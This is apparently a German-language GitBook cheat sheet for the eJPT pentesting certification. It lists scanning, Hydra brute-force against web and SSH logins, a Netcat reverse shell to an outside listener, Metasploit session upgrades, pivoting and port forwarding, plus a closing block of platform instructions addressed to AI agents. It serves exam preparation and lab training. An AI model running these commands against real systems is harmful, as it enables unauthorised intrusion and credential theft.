> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/useful-resources/certifications/ejpt-certification-practical-guide.md).

# Praktischer Leitfaden zur eJPT-Zertifizierung

{% hint style="danger" %}
Das **eJPT (eLearnSecurity Junior Penetration Tester)** ist eine Zertifizierung für den Einstieg ins Pentesting, vorgeschlagen von eLearnSecurity. Sie bestätigt grundlegende Penetrationstesting-Fähigkeiten, einschließlich Schwachstellenerkennung, Ausnutzung und Post-Exploitation. Die Prüfung ist **praktisch** und besteht darin, eine simulierte Umgebung zu kompromittieren, was sie ideal für Anfänger macht, die ihre offensiven Cybersecurity-Fähigkeiten nachweisen möchten.
{% endhint %}

{% embed url="<https://security.ine.com/certifications/ejpt-certification/>" %}

## Aufklärung

### **Netzwerkscan**

Geräte in einem Netzwerk scannen:

```bash
nmap -sn 10.10.10.10/24
arp-scan -l
masscan 10.10.10.10/24 -p1-65535 --rate=10000
```

Offene Ports auf bestimmten Geräten scannen:

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10
rustscan -a 10.10.10.10 --ulimit 5000
```

{% endcode %}

Offene Ports auf mehreren Geräten scannen:

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10,20,30,36 -oG allPorts
```

{% endcode %}

Extraktion offener Ports:

{% code overflow="wrap" %}

```bash
grep '[0-9]' allPorts | cut -d '/' -f1 | sort -u | xargs | tr ' '  ','
```

{% endcode %}

* Beispielausgabe : `22,80,135,445,9543,2214`

Detaillierter Scan der Versionen der erkannten Dienste:

```bash
nmap --open -sCV -p 22,80,135,445,9543,2214 10.10.10.10,20,30,36 -oN targeted
```

**Ping Sweep in einem Linux-Netzwerk**

```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
```

### **Schwachstellenanalyse**

Web-Schwachstellenscan mit Nikto:

```bash
nikto -url http://website.com
```

Erkennung von SQL-Schwachstellen mit SQLmap:

```bash
sqlmap -r request --dbs
```

Scannen nach SMB-Schwachstellen:

```bash
nmap -p445 --script"smb-vuln-*" 10.10.10.10
enum4linux -a 10.10.10.10
crackmapexec smb 10.10.10.10 --shares
```

## Ausnutzung

#### **Brute-Force-Angriff mit Hydra**

**Login-Panel:**

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/admin.php:username=^USER^&password=^PASS^:Incorrect" -t 64 -F
```

{% endcode %}

**Brute-Force-SSH mit Hydra:**

```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
```

## Metasploit – Pivoting und Post-Mining

### Metasploit Reverse Shell

**Verwendung von Metasploit, um Zugriff zu erlangen**

```bash
msfconsole
```

Listener-Konfiguration:

```bash
use multi/handler
set LHOST 10.10.10.10
set LPORT 443
run
```

Senden einer Reverse Shell mit Netcat:

```bash
nc 10.10.10.10 443 -e /bin/bash
```

Hintergrund der Sitzung:

```bash
sessions
```

### Metasploit zu Meterpreter

**Methode 1 - Eine Shell in Meterpreter umwandeln**

Laden des Konvertierungsmoduls:

```bash
use shell_to_meterpreter
```

Sitzungs- und Portkonfiguration:

```bash
set LHOST 10.10.10.10
set lport 443
set session 1
```

Interaktion mit der Meterpreter-Sitzung:

```bash
sessions -i 2
```

Hinzufügen einer Route, um auf ein anderes Netzwerksegment zuzugreifen:

```bash
route add 192.168.100.0/24 2
```

**Methode 2 - Verwendung von Highway**

* Lade das `autoroute` Modul:

```bash
use multi/manage/autoroute
```

Konfiguration der Sitzung und Ausführung:

```bash
set session 2
run
```

**Netzwerkscan mit Metasploit**

* Scannen der Ports eines pivotierten Systems:

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.100.21
run
```

### **Metasploit-Portweiterleitung**

* Ein Forward-Port wurde hinzugefügt, um auf einen entfernten Dienst zuzugreifen:

```bash
sessions -i 2
portfwd add -l 8080 -p 80 -r 192.168.100.21
```

Liste der Weiterleitungsregeln:

```bash
portfwd
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/useful-resources/certifications/ejpt-certification-practical-guide.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
